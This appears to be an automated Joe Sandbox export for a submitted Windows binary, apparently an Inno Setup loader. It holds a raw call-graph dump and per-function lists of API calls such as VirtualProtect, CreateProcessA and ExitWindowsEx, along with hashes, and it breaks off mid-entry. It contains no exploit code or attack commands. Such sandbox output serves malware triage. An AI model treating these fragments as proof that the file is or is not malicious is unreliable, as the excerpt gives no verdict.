5545->5547 5557 40188c 5546->5557 5548 40188c 3 API calls 5547->5548 5550 401cad 5548->5550 5551 401cc5 5550->5551 5567 401b44 5550->5567 5551->5537 5553 401cd4 5554 401cee 5553->5554 5572 401b98 5553->5572 5577 4013a0 5554->5577 5558 4018b2 5557->5558 5559 40190b 5557->5559 5581 401658 5558->5581 5559->5550 5564 4018e6 5564->5559 5566 4013a0 LocalAlloc 5564->5566 5566->5559 5568 401b61 5567->5568 5569 401b52 5567->5569 5568->5553 5570 401d00 9 API calls 5569->5570 5571 401b5f 5570->5571 5571->5553 5573 401bab 5572->5573 5574 401b9d 5572->5574 5573->5554 5575 401b74 9 API calls 5574->5575 5576 401baa 5575->5576 5576->5554 5578 4013ab 5577->5578 5579 4013c6 5578->5579 5580 4012e4 LocalAlloc 5578->5580 5579->5551 5580->5579 5583 40168f 5581->5583 5582 4016cf 5585 40132c 5582->5585 5583->5582 5584 4016a9 VirtualFree 5583->5584 5584->5583 5586 401348 5585->5586 5593 4012e4 5586->5593 5589 40150c 5592 40153b 5589->5592 5590 401594 5590->5564 5591 401568 VirtualFree 5591->5592 5592->5590 5592->5591 5596 40128c 5593->5596 5597 401298 LocalAlloc 5596->5597 5598 4012aa 5596->5598 5597->5598 5598->5564 5598->5589 5600 401787 5599->5600 5601 40183b 5600->5601 5602 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5600->5602 5604 40132c LocalAlloc 5600->5604 5605 401821 5600->5605 5607 4017d6 5600->5607 5608 4017e7 5601->5608 5617 4015c4 5601->5617 5602->5600 5604->5600 5606 40150c VirtualFree 5605->5606 5606->5608 5609 40150c VirtualFree 5607->5609 5608->5541 5609->5608 5611 401d80 9 API calls 5610->5611 5612 401de0 5611->5612 5613 40132c LocalAlloc 5612->5613 5615 401df0 5613->5615 5614 401df8 5614->5543 5615->5614 5616 401b44 9 API calls 5615->5616 5616->5614 5618 40160a 5617->5618 5619 401626 VirtualAlloc 5618->5619 5620 40163a 5618->5620 5619->5618 5619->5620 5620->5608 5623 401ef0 5621->5623 5622 401f1c 5624 401d00 9 API calls 5622->5624 5626 401f40 5622->5626 5623->5622 5623->5626 5627 401e58 5623->5627 5624->5626 5626->5505 5626->5506 5632 4016d8 5627->5632 5630 401e75 5630->5623 5631 401dcc 9 API calls 5631->5630 5635 4016f4 5632->5635 5634 4016fe 5636 4015c4 VirtualAlloc 5634->5636 5635->5634 5637 40175b 5635->5637 5638 40132c LocalAlloc 5635->5638 5640 40174f 5635->5640 5642 401430 5635->5642 5639 40170a 5636->5639 5637->5630 5637->5631 5638->5635 5639->5637 5641 40150c VirtualFree 5640->5641 5641->5637 5643 40143f VirtualAlloc 5642->5643 5645 40146c 5643->5645 5646 40148f 5643->5646 5647 4012e4 LocalAlloc 5645->5647 5646->5635 5648 401478 5647->5648 5648->5646 5649 40147c VirtualFree 5648->5649 5649->5646 6490 4028d2 6491 4028da 6490->6491 6492 403554 4 API calls 6491->6492 6493 4028ef 6491->6493 6492->6491 6494 4025ac 4 API calls 6493->6494 6495 4028f4 6494->6495 6815 4019d3 6816 4019ba 6815->6816 6817 4019c3 RtlLeaveCriticalSection 6816->6817 6818 4019cd 6816->6818 6817->6818 6037 407fd4 6038 407fe6 6037->6038 6040 407fed 6037->6040 6048 407f10 6038->6048 6041 408021 6040->6041 6042 408015 6040->6042 6043 408017 6040->6043 6044 40804e 6041->6044 6046 407d7c 19 API calls 6041->6046 6062 407e2c 6042->6062 6059 407d7c 6043->6059 6046->6044 6049 407f25 6048->6049 6050 407d7c 19 API calls 6049->6050 6051 407f34 6049->6051 6050->6051 6052 407f6e 6051->6052 6053 407d7c 19 API calls 6051->6053 6054 407f82 6052->6054 6055 407d7c 19 API calls 6052->6055 6053->6052 6058 407fae 6054->6058 6069 407eb8 6054->6069 6055->6054 6058->6040 6072 4058b4 6059->6072 6061 407d9e 6061->6041 6063 405184 19 API calls 6062->6063 6064 407e57 6063->6064 6080 407de4 6064->6080 6066 407e5f 6067 403198 4 API calls 6066->6067 6068 407e74 6067->6068 6068->6041 6070 407ec7 VirtualFree 6069->6070 6071 407ed9 VirtualAlloc 6069->6071 6070->6071 6071->6058 6073 4058c0 6072->6073 6074 405184 19 API calls 6073->6074 6075 4058ed 6074->6075 6076 4031e8 4 API calls 6075->6076 6077 4058f8 6076->6077 6078 403198 4 API calls 6077->6078 6079 40590d 6078->6079 6079->6061 6081 4058b4 19 API calls 6080->6081 6082 407e06 6081->6082 6082->6066 6500 40a0d5 6501 40a105 6500->6501 6502 40a10f CreateWindowExA SetWindowLongA 6501->6502 6503 405184 19 API calls 6502->6503 6504 40a192 6503->6504 6505 4032fc 4 API calls 6504->6505 6506 40a1a0 6505->6506 6507 4032fc 4 API calls 6506->6507 6508 40a1ad 6507->6508 6509 406b7c 5 API calls 6508->6509 6510 40a1b9 6509->6510 6511 4032fc 4 API calls 6510->6511 6512 40a1c2 6511->6512 6513 4099a4 29 API calls 6512->6513 6514 40a1d4 6513->6514 6515 409884 5 API calls 6514->6515 6516 40a1e7 6514->6516 6515->6516 6517 40a220 6516->6517 6518 4094d8 9 API calls 6516->6518 6519 40a239 6517->6519 6522 40a233 RemoveDirectoryA 6517->6522 6518->6517 6520 40a242 73A25CF0 6519->6520 6521 40a24d 6519->6521 6520->6521 6523 40a275 6521->6523 6524 40357c 4 API calls 6521->6524 6522->6519 6525 40a26b 6524->6525 6526 4025ac 4 API calls 6525->6526 6526->6523 6085 40a0e7 6086 40a0eb SetLastError 6085->6086 6117 409648 GetLastError 6086->6117 6089 40a105 6091 40a10f CreateWindowExA SetWindowLongA 6089->6091 6090 402f24 5 API calls 6090->6089 6092 405184 19 API calls 6091->6092 6093 40a192 6092->6093 6094 4032fc 4 API calls 6093->6094 6095 40a1a0 6094->6095 6096 4032fc 4 API calls 6095->6096 6097 40a1ad 6096->6097 6130 406b7c GetCommandLineA 6097->6130 6100 4032fc 4 API calls 6101 40a1c2 6100->6101 6135 4099a4 6101->6135 6104 409884 5 API calls 6105 40a1e7 6104->6105 6106 40a220 6105->6106 6107 40a207 6105->6107 6109 40a239 6106->6109 6112 40a233 RemoveDirectoryA 6106->6112 6151 4094d8 6107->6151 6110 40a242 73A25CF0 6109->6110 6111 40a24d 6109->6111 6110->6111 6113 40a275 6111->6113 6159 40357c 6111->6159 6112->6109 6115 40a26b 6116 4025ac 4 API calls 6115->6116 6116->6113 6118 404c84 19 API calls 6117->6118 6119 40968f 6118->6119 6120 407284 5 API calls 6119->6120 6121 40969f 6120->6121 6122 408da8 4 API calls 6121->6122 6123 4096b4 6122->6123 6124 405880 4 API calls 6123->6124 6125 4096c3 6124->6125 6126 4031b8 4 API calls 6125->6126 6127 4096e2 6126->6127 6128 403198 4 API calls 6127->6128 6129 4096ea 6128->6129 6129->6089 6129->6090 6131 406af0 4 API calls 6130->6131 6132 406ba1 6131->6132 6133 403198 4 API calls 6132->6133 6134 406bbf 6133->6134 6134->6100 6136 4033b4 4 API calls 6135->6136 6137 4099df 6136->6137 6138 409a11 CreateProcessA 6137->6138 6139 409a24 CloseHandle 6138->6139 6140 409a1d 6138->6140 6142 409a2d 6139->6142 6141 409648 21 API calls 6140->6141 6141->6139 6172 409978 6142->6172 6145 409a49 6146 409978 3 API calls 6145->6146 6147 409a4e GetExitCodeProcess CloseHandle 6146->6147 6148 409a6e 6147->6148 6149 403198 4 API calls 6148->6149 6150 409a76 6149->6150 6150->6104 6150->6105 6152 409532 6151->6152 6156 4094eb 6151->6156 6152->6106 6153 4094f3 Sleep 6153->6156 6154 409503 Sleep 6154->6156 6156->6152 6156->6153 6156->6154 6157 40951a GetLastError 6156->6157 6176 408fbc 6156->6176 6157->6152 6158 409524 GetLastError 6157->6158 6158->6152 6158->6156 6160 403591 6159->6160 6161 4035a0 6159->6161 6166 4035d0 6160->6166 6167 40359b 6160->6167 6168 4035b6 6160->6168 6162 4035b1 6161->6162 6163 4035b8 6161->6163 6164 403198 4 API calls 6162->6164 6165 4031b8 4 API calls 6163->6165 6164->6168 6165->6168 6166->6168 6170 40357c 4 API calls 6166->6170 6167->6161 6169 4035ec 6167->6169 6168->6115 6169->6168 6184 403554 6169->6184 6170->6166 6173 40998c PeekMessageA 6172->6173 6174 409980 TranslateMessage DispatchMessageA 6173->6174 6175 40999e MsgWaitForMultipleObjects 6173->6175 6174->6173 6175->6142 6175->6145 6177 408f70 2 API calls 6176->6177 6178 408fd2 6177->6178 6179 408fd6 6178->6179 6180 408ff2 DeleteFileA GetLastError 6178->6180 6179->6156 6181 409010 6180->6181 6182 408fac Wow64RevertWow64FsRedirection 6181->6182 6183 409018 6182->6183 6183->6156 6186 403566 6184->6186 6187 403578 6186->6187 6188 403604 6186->6188 6187->6169 6189 40357c 6188->6189 6190 4035a0 6189->6190 6195 4035d0 6189->6195 6196 40359b 6189->6196 6197 4035b6 6189->6197 6191 4035b1 6190->6191 6192 4035b8 6190->6192 6193 403198 4 API calls 6191->6193 6194 4031b8 4 API calls 6192->6194 6193->6197 6194->6197 6195->6197 6199 40357c 4 API calls 6195->6199 6196->6190 6198 4035ec 6196->6198 6197->6186 6198->6197 6200 403554 4 API calls 6198->6200 6199->6195 6200->6198 6822 402be9 RaiseException 6823 402c04 6822->6823 6533 402af2 6534 402afe 6533->6534 6537 402ed0 6534->6537 6538 403154 4 API calls 6537->6538 6540 402ee0 6538->6540 6539 402b03 6540->6539 6542 402b0c 6540->6542 6543 402b25 6542->6543 6544 402b15 RaiseException 6542->6544 6543->6539 6544->6543 6824 402dfa 6825 402e26 6824->6825 6826 402e0d 6824->6826 6828 402ba4 6826->6828 6829 402bc9 6828->6829 6830 402bad 6828->6830 6829->6825 6831 402bb5 RaiseException 6830->6831 6831->6829 6832 4075fa GetFileSize 6833 407626 6832->6833 6834 407616 GetLastError 6832->6834 6834->6833 6835 40761f 6834->6835 6836 40748c 21 API calls 6835->6836 6836->6833 6837 406ffb 6838 407008 SetErrorMode 6837->6838 6549 403a80 CloseHandle 6550 403a90 6549->6550 6551 403a91 GetLastError 6549->6551 6552 40a282 6554 40a1f4 6552->6554 6553 40a220 6556 40a239 6553->6556 6559 40a233 RemoveDirectoryA 6553->6559 6554->6553 6555 4094d8 9 API calls 6554->6555 6555->6553 6557 40a242 73A25CF0 6556->6557 6558 40a24d 6556->6558 6557->6558 6560 40a275 6558->6560 6561 40357c 4 API calls 6558->6561 6559->6556 6562 40a26b 6561->6562 6563 4025ac 4 API calls 6562->6563 6563->6560 6564 404283 6565 4042c3 6564->6565 6566 403154 4 API calls 6565->6566 6567 404323 6566->6567 6839 404185 6840 4041ff 6839->6840 6841 4041cc 6840->6841 6842 403154 4 API calls 6840->6842 6843 404323 6842->6843 6568 40a287 6569 40a290 6568->6569 6571 40a2bb 6568->6571 6578 409448 6569->6578 6573 403198 4 API calls 6571->6573 6572 40a295 6572->6571 6576 40a2b3 MessageBoxA 6572->6576 6574 40a2f3 6573->6574 6575 403198 4 API calls 6574->6575 6577 40a2fb 6575->6577 6576->6571 6579 409454 GetCurrentProcess OpenProcessToken 6578->6579 6580 4094af ExitWindowsEx 6578->6580 6581 409466 6579->6581 6582 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6579->6582 6580->6581 6581->6572 6582->6580 6582->6581 6583 403e87 6584 403e4c 6583->6584 6585 403e67 6584->6585 6586 403e62 6584->6586 6587 403e7b 6584->6587 6590 403e78 6585->6590 6596 402674 6585->6596 6592 403cc8 6586->6592 6589 402674 4 API calls 6587->6589 6589->6590 6593 403cd6 6592->6593 6594 402674 4 API calls 6593->6594 6595 403ceb 6593->6595 6594->6595 6595->6585 6597 403154 4 API calls 6596->6597 6598 40267a 6597->6598 6598->6590 6603 407e90 6604 407eb8 VirtualFree 6603->6604 6605 407e9d 6604->6605 6852 403991 6853 403983 6852->6853 6854 40374c VariantClear 6853->6854 6855 40398b 6854->6855 6856 405b92 6858 405b94 6856->6858 6857 405bd0 6861 405930 5 API calls 6857->6861 6858->6857 6859 405be7 6858->6859 6860 405bca 6858->6860 6865 404ccc 5 API calls 6859->6865 6860->6857 6862 405c3c 6860->6862 6863 405be3 6861->6863 6864 4059a0 19 API calls 6862->6864 6866 403198 4 API calls 6863->6866 6864->6863 6867 405c10 6865->6867 6868 405c76 6866->6868 6869 4059a0 19 API calls 6867->6869 6869->6863 6608 403e95 6609 403e4c 6608->6609 6610 403e62 6609->6610 6611 403e7b 6609->6611 6613 403e67 6609->6613 6612 403cc8 4 API calls 6610->6612 6614 402674 4 API calls 6611->6614 6612->6613 6615 403e78 6613->6615 6616 402674 4 API calls 6613->6616 6614->6615 6616->6615 6617 403a97 6618 403aac 6617->6618 6619 403bbc GetStdHandle 6618->6619 6620 403b0e CreateFileA 6618->6620 6630 403ab2 6618->6630 6621 403c17 GetLastError 6619->6621 6625 403bba 6619->6625 6620->6621 6622 403b2c 6620->6622 6621->6630 6624 403b3b GetFileSize 6622->6624 6622->6625 6624->6621 6626 403b4e SetFilePointer 6624->6626 6627 403be7 GetFileType 6625->6627 6625->6630 6626->6621 6631 403b6a ReadFile 6626->6631 6629 403c02 CloseHandle 6627->6629 6627->6630 6629->6630 6631->6621 6632 403b8c 6631->6632 6632->6625 6633 403b9f SetFilePointer 6632->6633 6633->6621 6634 403bb0 SetEndOfFile 6633->6634 6634->6621 6634->6625 6888 4011aa 6889 4011ac GetStdHandle 6888->6889 6227 4076ac SetEndOfFile 6228 4076c3 6227->6228 6229 4076bc 6227->6229 6230 40748c 21 API calls 6229->6230 6230->6228 6638 4028ac 6639 402594 4 API calls 6638->6639 6640 4028b6 6639->6640 6641 401ab9 6642 401a96 6641->6642 6643 401aa9 RtlDeleteCriticalSection 6642->6643 6644 401a9f RtlLeaveCriticalSection 6642->6644 6644->6643

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 129 409b7f-409b82 126->129 127->128 130 409baa-409bad 128->130 129->124 129->128 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                              APIs
                                                              • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                              • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                              • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                              • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Virtual$ProtectQuery$InfoSystem
                                                              • String ID:
                                                              • API String ID: 2441996862-0
                                                              • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                              • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                              • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                              • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                              • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                              • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                              • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                              • API String ID: 3256987805-3653653586
                                                              • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                              • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                              • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                              • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                              Control-flow Graph

                                                              APIs
                                                              • SetLastError.KERNEL32 ref: 0040A0F4
                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,021C15AC), ref: 0040966C
                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                              • SetWindowLongA.USER32(00020424,000000FC,00409918), ref: 0040A148
                                                              • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                              • 73A25CF0.USER32(00020424,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                              • API String ID: 3341979996-3001827809
                                                              • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                              • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                              • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                              • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                              • API String ID: 1646373207-2130885113
                                                              • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                              • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                              • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                              • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                              • SetWindowLongA.USER32(00020424,000000FC,00409918), ref: 0040A148
                                                                • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021C15AC,00409A90,00000000,00409A77), ref: 00409A14
                                                                • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021C15AC,00409A90,00000000), ref: 00409A28
                                                                • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021C15AC,00409A90), ref: 00409A5C
                                                              • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                              • 73A25CF0.USER32(00020424,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                              • API String ID: 978128352-3001827809
                                                              • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                              • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                              • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                              • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021C15AC,00409A90,00000000,00409A77), ref: 00409A14
                                                              • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021C15AC,00409A90,00000000), ref: 00409A28
                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                              • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021C15AC,00409A90), ref: 00409A5C
                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,021C15AC), ref: 0040966C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                              • String ID: D
                                                              • API String ID: 3356880605-2746444292
                                                              • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                              • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                              • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                              • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                              Control-flow Graph

                                                              APIs
                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: .tmp$y@
                                                              • API String ID: 2030045667-2396523267
                                                              • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                              • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
